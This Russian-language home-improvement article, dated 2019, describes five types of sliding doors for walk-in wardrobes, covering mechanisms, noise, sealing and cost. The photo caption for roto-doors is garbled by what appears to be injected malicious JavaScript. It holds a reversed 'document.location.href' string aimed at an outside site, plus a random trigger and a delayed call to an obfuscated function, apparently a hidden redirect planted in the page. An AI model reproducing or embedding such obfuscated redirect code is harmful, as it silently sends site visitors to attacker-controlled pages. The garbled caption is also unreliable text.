Добавить в закладки

5 разновидностей раздвижных дверей

Сегодня на рынке существует большой выбор раздвижных дверей для гардеробных комнат. Различаются они не только по дизайну и материалам из которых изготовлены, но, главным образом, по механизмам перемещения створок. Эта характеристика влияет на цену и надежность конструкции. Давайте рассмотрим самые распространенные варианты.

Раздвижные двери для гардеробной

Раздвижные двери для гардеробной. Фото: servusglass.com

Откатные двери

Данный вид представляет собой одностворчатую дверь в обрамляющей кассете с профилем в форме буквы П, благодаря которому происходит движение. Сложностью сборки кассеты обусловлена высокая стоимость, оправдывающая себя в процессе эксплуатации. Конструкция не пропускает посторонние запахи. Хорошая звукоизоляция позволяет устанавливать данный тип в спальнях с отдельными гардеробными.

Откатные двери

Откатные двери. Фото: vhod.guru

Двери-купе

Две или больше створки в дверях-купе перемещаются на роликах по профилю и перекрывают друг друга при открывании. Вход в гардеробную будет сопровождаться шумом перемещающихся колесиков. Проем при использовании такого метода неширокий. Герметичность существенно отличается от откатной, поэтому их не стоит монтировать в хранилище для вещей, находящееся рядом с кухней.

Двери-купе

Двери-купе. Фото: mebel-trislona.ru

Техно-двери

Створки, перекрывающие дверной проем, крепятся на навесной держатель сверху. Дополнительно внизу крепится плинтус для их передвижения. Такая конструкция надежна, занимает мало места, позволяет легко регулировать зазор между стеной и дверцами. Чтобы не возникло трудностей с передвижением, рекомендуется подбирать для полотен нетяжелый материал.

Техно-двери

Техно-двери. Фото: happymodern.ru

Складные двери

Раздвигающиеся в обе стороны от середины дверного проема полотна, складываются гармошкой. Между собой они скрепляются петлями, которые время от времени нужно подкручивать. На торцах дверей, располагающихся в середине проема, прикреплены роликовые колесики. Уровень шума при открывании средний.  Устанавливать подобные модели следует в больших по площади помещениях.

Складные двери

Складные двери. Фото: dekorin.me

Рото-дверь

Самой дорогой, но при этом самой стильной, моделью являются рото-двери. Для них не нужен монтаж направляющих конструкций, так как они проворачиваются вокруг. Идеально подходят для помещений с узким дверным проемом и угловых шкафов. Длительный срок службы гарантирован при монтаже и обслуживании профессионалами, так как существует много важных нюансов, влияющих на их функциональность.

Рото-двери

Рото-двери. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-dveri/mezhkomnatnaya-dver-s-rotacionnim-mehanizmom.jpg»>intecron-msk.ru

Мы рассказали о самых распространенных типах раздвижных дверей. Кроме этого они отличаются по цене, уровню сложности монтажа, способам ухода и другим важным характеристикам. Изучив главные требования вы с легкостью сделаете правильный выбор.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 18.06.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: